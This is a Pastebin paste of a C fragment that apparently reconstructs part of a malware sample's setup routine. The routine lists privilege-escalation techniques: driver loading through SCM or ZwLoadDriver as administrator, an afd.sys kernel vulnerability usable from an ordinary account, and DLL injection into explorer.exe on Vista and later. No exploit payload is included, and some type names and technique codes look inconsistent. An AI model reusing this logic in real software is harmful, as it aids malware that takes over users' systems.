Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- typedef struct _avtr_listelem
- {
- struct _avtr_listelem* next;
- struct _avtr_listelem* prev;
- DWORD technique; /*0x08*/
- DWORD privilege_value; /*0x0C*/
- DWORD n_tries; /*0x10*/
- DWORD milliseconds; /*0x14*/
- } avtr_listelem, *pavtr_listelem;
- pavtr_listelem gList;
- int gElemCount;
- BOOL Avtr_setup_list()
- {
- pavtr_listelem Elem = NULL;
- DWORD privilege_value_val;
- if ( IsAdmin )
- {
- /*appends element at the end of the list or initializes the list head (gList) if it's NULL*/
- Elem = List_appendElem(&gList,sizeof(avtr_listeelem),&gElemCount,hHeap);
- if ( Elem )
- {
- if ( ! gList )
- {
- gList = Elem;
- }
- Elem->technique = 0x80000000; //SCM or ZwLoadDriver
- Elem->privilege_value = 2; //Administrator
- Elem->n_tries = 1;
- Elem->milliseconds = 30000;
- }
- }
- if ( Avtr_isVulnerable("afd.sys",2011,10) )
- {
- Elem = List_appendElem(&gList,sizeof(avtr_listeelem),&gElemCount,hHeap);
- if ( Elem )
- {
- if ( ! gList )
- {
- gList = Elem;
- }
- Elem->technique = 0x80000000;//afd.sys vulnerability
- Elem->privilege_value = 1;//ordinary user
- Elem->n_tries = 1;
- Elem->milliseconds = 30000;
- }
- }
- if ( IsAdmin )
- {
- privilege_value_val = 2;
- }
- else if ( ServicePackMajor_defined >= 8 ) ////Vista and above
- {
- privilege_value_val = 0x80000002;
- }
- else
- {
- goto ret;
- }
- Elem = List_appendElem(&gList,sizeof(avtr_listeelem),&gElemCount,hHeap);
- if ( ! gList )
- {
- gList = Elem;
- }
- Elem->technique = 0x80000001;//explorer.exe DLL injection
- Elem->privilege_value = privilege_value_val;
- Elem->n_tries = 1;
- Elem->milliseconds = 30000;
- ret :
- return (gElemCount > 0);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
